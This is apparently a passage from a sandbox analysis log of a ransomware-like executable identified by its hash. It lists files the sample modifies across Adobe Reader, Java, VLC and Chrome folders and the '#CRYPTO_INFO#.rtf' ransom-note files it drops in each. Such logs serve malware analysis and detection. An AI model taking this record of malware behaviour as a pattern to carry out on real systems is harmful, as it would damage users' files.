8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\jjs.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\cstm_brand_preview.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\javaws.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview_selected-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands_3.6.100.v20140528-1422.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\it_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_duplicate_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\en-US.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\file_info.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\line.cur 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\flags.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\appletviewer.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_filetype_psd.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\rss.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\UnpublishPublish.xlsx 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\wsgen.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Windows Mail\wabmig.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\file_info.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_nl_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_ru.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\Flash.mpp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\jni_md.h 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ar-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.util_1.0.500.v20130404-1337.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\close.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\rmic.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\plugin-selectors.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\spectrum_spinner.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_LinkDrop32x32.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\dot_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\tr-tr\#CRYPTO_INFO#.rtf 